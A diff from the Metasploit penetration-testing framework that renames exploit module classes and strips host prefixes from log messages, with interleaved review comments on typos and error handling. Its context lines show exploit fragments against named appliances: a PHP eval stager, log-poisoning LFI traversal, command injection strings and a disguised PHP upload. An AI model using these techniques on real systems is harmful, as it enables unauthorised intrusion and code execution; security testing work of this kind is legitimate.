@@ -109,7 +109,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin - print_status("#{peer} - Establishing session with target ...") + print_status("Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', @@ -129,13 +129,13 @@ class Metasploit4 < Msf::Exploit::Remote # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting - print_status("#{peer} - Upgrading session to administrator ...") + print_status("Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) - vprint_status("#{peer} - PHP Object: #{php_object}") + vprint_status("PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") + vprint_status("Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) @@ -146,7 +146,7 @@ class Metasploit4 < Msf::Exploit::Remote config_time = ::Time.now.to_i begin - print_status("#{peer} - Extracting existing host configuration ...") + print_status("Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', 
@@ -173,8 +173,8 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end - print_good("#{peer} - Host configuration extracted.") - vprint_status("#{peer} - Host configuration: #{host_config}") + print_good("Host configuration extracted.") + vprint_status("Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations @@ -191,7 +191,7 @@ class Metasploit4 < Msf::Exploit::Remote installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>") - vprint_status("#{peer} - Stager: #{stager}") + vprint_status("Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML @@ -203,7 +203,7 @@ class Metasploit4 < Msf::Exploit::Remote vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 
@@ -227,10 +227,10 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end - print_good("#{peer} - Stager uploaded.") + print_good("Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. - print_status("#{peer} - Executing stager ...") + print_status("Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>" @@ -250,20 +250,20 @@ class Metasploit4 < Msf::Exploit::Remote ) if res && res.code == 200 - print_good("#{peer} - Stager execution succeeded, payload ready for execution.") + print_good("Stager execution succeeded, payload ready for execution.") else - print_error("#{peer} - Stager execution failed (invalid result).") + print_error("Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("#{peer} - Stager execution failed (unable to establish connection).") + print_error("Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. - print_status("#{peer} - Restoring host config ...") + print_status("Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', 
@@ -281,7 +281,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 8 - invoke the installed payload, but only if all went to plan. unless errored - print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") + print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', @@ -325,7 +325,7 @@ class Metasploit4 < Msf::Exploit::Remote cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("#{peer} - Cookie value: #{cookie_value}") + vprint_status("Cookie value: #{cookie_value}") cookie_value end diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 38434f957a..73e08f8e2c 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit buffer = self.send(target[:callback]) - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_close_window_request(buffer, payload.encoded) end diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index d06f0ab552..a8559df320 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb index f34b35bbf2..01a4a6e9f3 100644 --- a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index f3e0af32f5..3da6b67212 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = "subnet=" post_data << "\";" + payload.raw + ";#" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'spywall/ipchange.php'), @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably # something is wrong if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 5eef56db31..6ced3d32a4 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(after_filename, "application/octet-stream", nil, "form-data; name=\"after_filename\"") post_data.add_part("<?php #{payload.encoded} ?>", "image/gif", nil, "form-data; name=\"new_image\"; filename=\"#{payload_name}\"") - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "spywall/blocked_file.php"), @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote # of the default file, we assume we uploaded the malicious # file successfully if not res or res.code != 200 or res.body !~ /temp.php/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index ca0376af14..e2080dcb13 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'WfsDelay' => 300, #5 minutes - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'EXITFUNC' => 'thread' }, 'Platform' => ['php'], @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote php = %Q|<?php #{payload.encoded} ?>| # Inject PHP to log - print_status("#{peer} - Injecting PHP to log...") + print_status("Injecting PHP to log...") res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{php}" @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote # Use the directory traversal to load the PHP code # access_log takes a long time to retrieve - print_status("#{peer} - Loading PHP code..") + print_status("Loading PHP code..") send_request_raw({ 'method' => 'GET', 'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' }) - print_status("#{peer} - Waiting for a session, may take some time...") + print_status("Waiting for a session, may take some time...") select(nil, nil, nil, 1) diff --git a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb index dab96c8f57..06c63e82c8 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index 46fe21a41f..fcac6a43c6 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb 
+++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -47,7 +47,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 9cfd6f0a9a..b14df13f6d 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else - vprint_status("#{peer} - Detection failed") + vprint_status("Detection failed") return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + vprint_status("Model #{model} with version #{version}-#{build} detected") case version when '4.0' 
@@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') # send request to append shell commands - print_status("#{peer} - Injecting the payload...") + print_status("Injecting the payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('webman', 'imageSelector.cgi'), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote end # send request to invoke the injected shell commands - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('redirect.cgi'), @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end - print_good("#{peer} - Command successfully executed") + print_good("Command successfully executed") print_line(res.body) end end diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb index e64f6b7146..24e3053e41 100644 --- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb +++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -71,13 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd 
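Review bot: `print_line(res.body)` at the end of the `@@ -155,7` hunk in synology_dsm_sliceupload_exec_noauth.rb writes the remote server's response body to the operator's console unmodified. That body is controlled by the system under test, so control characters or terminal escape sequences in it would reach the terminal and any saved log unless the print layer filters them, which is not visible here. Consider printing a sanitized form, for example `print_line(res.body.to_s.gsub(/[^[:print:]\n\t]/, '.'))`. The `Command output: #{$1}` message in vap2500_tools_command_exec.rb has the same property.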
@@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ - print_good("#{peer} - Command sent successfully") + print_good("Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m - print_status("#{peer} - Command output: #{$1}") + print_status("Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index f645a359fc..01a99e80ec 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 2ee3d5bb07..e75ce9a283 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode("echo #{fingerprint}") data << "%26" - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end 
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode(payload.raw) data << "%26" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/WANem/result.php', @@ -100,12 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") end if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end end diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index 0aa9a24a84..0ca6edf548 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = target_uri.path - print_status("#{peer} - Housing php payload...") + print_status("Housing php payload...") # Allow commands to be passed as a header. # We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff. @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => post_data }) - print_status("#{peer} - Loading our payload...") + print_status("Loading our payload...") # Execute our payload send_request_raw({ diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 27ad401c98..1d7bbbe1a9 100644 
--- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{client.peerhost}:#{client.peerport}" if client.type != "meterpreter" - print_error("#{peer} - NOTE: you must use a meterpreter payload in order to automatically cleanup.") - print_error("#{peer} - The currencies.php won't be restored automatically.") + print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") + print_error("The currencies.php won't be restored automatically.") return end @@ -102,19 +102,19 @@ class Metasploit3 < Msf::Exploit::Remote currencies_php = currencies_php.gsub(/^ {6}/, '') pwd = client.fs.dir.pwd - print_status("#{peer} - Searching currencies.php file from #{pwd}") + print_status("Searching currencies.php file from #{pwd}") res = client.fs.file.search(nil, "currencies.php", true, -1) res.each do |hit| filename = "#{hit['path']}/#{hit['name']}" - print_warning("#{peer} - Restoring #{filename}") + print_warning("Restoring #{filename}") client.fs.file.rm(filename) fd = client.fs.file.new(filename, "wb") fd.write(currencies_php) fd.close end - print_status("#{peer} - Cleanup finished") + print_status("Cleanup finished") end @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote stub = "\0'));#{payload.encoded}?>" - print_status("#{peer} - Injecting the PHP payload") + print_status("Injecting the PHP payload") response = send_request_cgi({ 'uri' => normalize_uri(uri, "converter.php"), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Executing the PHP payload") + print_status("Executing the PHP payload") timeout = 0.01 response = send_request_cgi({ 
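Review bot: In the `@@ -82,8` hunk of webid_converter.rb the context line `peer = "#{client.peerhost}:#{client.peerport}"` is kept, although every visible use of that local in this hunk and in `@@ -102,19` has been removed. If nothing outside the hunks still reads it, the assignment is now dead and should be deleted. Note also that these cleanup messages used to be tagged with the session's peer rather than the module's target. If the prefix is now added automatically (not shown here), confirm it still identifies the right host for session-side output. The method starts before the hunk and continues past it.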
diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 73ae05f5fa..ac08535943 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 - vprint_status("#{peer} - Zabbix version #{version} detected") + vprint_status("Zabbix version #{version} detected") else # If this fails, guest access may not be enabled - vprint_status("#{peer} - Unable to access httpmon.php") + vprint_status("Unable to access httpmon.php") return Exploit::CheckCode::Unknown end @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/ session = $1 - print_status("#{peer} - Extracted session cookie - [ #{session} ]") + print_status("Extracted session cookie - [ #{session} ]") return session else fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session") @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote @sid = "#{@session[16..-1]}" script_name = rand_text_alpha(8) # Upload script - print_status("#{peer} - Attempting to inject payload") + print_status("Attempting to inject payload") res = send_request_cgi({ 'method' => 'POST', 'cookie' => "zbx_sessionid=#{@session}", 
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script added)/ - print_status("#{peer} - Payload injected successfully") + print_status("Payload injected successfully") else fail_with(Failure::Unknown, "#{peer} - Payload injection failed!") end @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)" - print_status("#{peer} - Cleaning script remnants") + print_status("Cleaning script remnants") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -173,9 +173,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script deleted)/ - print_status("#{peer} - Script removed successfully") + print_status("Script removed successfully") else - print_warning("#{peer} - Unable to remove script #{@scriptid}") + print_warning("Unable to remove script #{@scriptid}") end end end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 9a3a544ed4..d388ce25d8 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from config file - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/config/global.conf' 
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote lines = rand(100) + 1 # send payload - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") + print_status("Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ 'uri' => '/index.cgi', diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 30baf11724..e92284d97c 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Save @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}" # send payload - print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)") + print_status("Sending payload to Zenoss (#{command.length.to_s} bytes)") begin res = send_request_cgi({ 'method' => 'POST', 
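Review bot: The `rescue` clause left as context in the zenoss_showdaemonxmlconfig_exec.rb `@@ -73,7 +73,7 @@` hunk names `::Rex::ConnectionTimeoutp`, which differs from the `::Rex::ConnectionTimeout` used by the sibling rescue clauses in this diff and looks like a typo. Ruby only resolves the classes in a rescue list while matching a raised exception, so an error not caught by the first two classes would likely surface as a NameError instead of reaching the `vprint_error` edited here. The trailing `return Exploit::CheckCode::Save` has the same problem, since `Safe` is the name used a few lines earlier. Suggested lines: `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout` and `return Exploit::CheckCode::Safe`. The `check` method starts above the hunk.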
@@ -94,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "#{postdata}", }) if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/ - print_error("#{peer} - Authentication failed. Incorrect username/password.") + print_error("Authentication failed. Incorrect username/password.") return end - print_status("#{peer} - Sent payload successfully") + print_status("Sent payload successfully") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") rescue - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end handler diff --git a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb index 834763a5ad..02b241e7f3 100644 --- a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb +++ b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index 33c4fe64af..219b4303e0 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index a8eb39a855..e540d03efe 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb 
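Review bot: The bare `rescue` at the end of the `@@ -94,14 +94,14 @@` hunk prints only "Sending payload failed" and discards the exception, so the operator cannot tell a programming error from a transport failure when reading the log. I would bind the exception and report it, `rescue => e` followed by `print_error("Sending payload failed: #{e.class} #{e.message}")`. The header test `res['Bobo-Exception-Type'] =~ /^Unauthorized$/` also uses line anchors; `\A`/`\z` states the exact-match intent more precisely. The method containing this block starts outside the hunk.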
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Brute
diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb
index f325ba29ea..6ece63523c 100644
--- a/modules/exploits/linux/local/desktop_privilege_escalation.rb
+++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb
@@ -9,7 +9,7 @@ require 'msf/core/exploit/exe'
 require 'base64'
 require 'metasm'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 Rank = ExcellentRanking
 include Msf::Exploit::EXE
 include Msf::Post::File
diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb
index b6a739210f..2a1659297a 100644
--- a/modules/exploits/linux/local/hp_smhstart.rb
